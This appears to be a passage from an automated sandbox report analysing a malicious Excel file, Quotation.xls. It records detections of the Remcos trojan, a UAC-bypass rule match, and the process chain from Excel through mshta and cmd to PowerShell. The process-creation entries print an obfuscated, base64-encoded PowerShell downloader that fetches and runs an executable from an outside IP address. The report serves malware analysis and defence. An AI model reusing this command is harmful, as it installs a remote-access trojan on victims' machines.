            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 25_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00427A4625_2_00427A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041DB6225_2_0041DB62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00427BAF25_2_00427BAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00437D3325_2_00437D33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00435E5E25_2_00435E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00426E0E25_2_00426E0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043DE9D25_2_0043DE9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00413FCA25_2_00413FCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00436FEA25_2_00436FEA
            Source: Quotation.xls, OLE indicator, VBA macros: true
            Source: ~DF91B6A489623540E3.TMP.0.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\user\AppData\Roaming\winiti.exe, Code function: String function: 000000013F5F9D50 appears 51 times
            Source: C:\Users\user\AppData\Roaming\winiti.exe, Code function: String function: 000000013FDD9D50 appears 51 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: String function: 00401E65 appears 34 times
            Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 25.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: csrss[1].exe.7.dr, Static PE information: Section: .rsrc ZLIB complexity 0.9982945393041237
            Source: winiti.exe.7.dr, Static PE information: Section: .rsrc ZLIB complexity 0.9982945393041237
            Source: classification engine, Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@29/32@6/5
            Source: C:\Users\user\AppData\Roaming\winiti.exe, Code function: 11_2_000000013FDE2A80 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
            Source: C:\Users\user\AppData\Roaming\winiti.exe, Code function: 22_2_000000013F602A80 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: 25_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: 25_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: 25_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Code function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\37330000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Mutant created: \Sessions\1\BaseNamedObjects\chrome-E2SMAR
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR95A9.tmp
            Source: Quotation.xls, OLE indicator, Workbook stream: true
            Source: 37330000.0.dr, OLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Quotation.xls ReversingLabs: Detection: 18%
            Source: Quotation.xls Virustotal: Detection: 24%
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4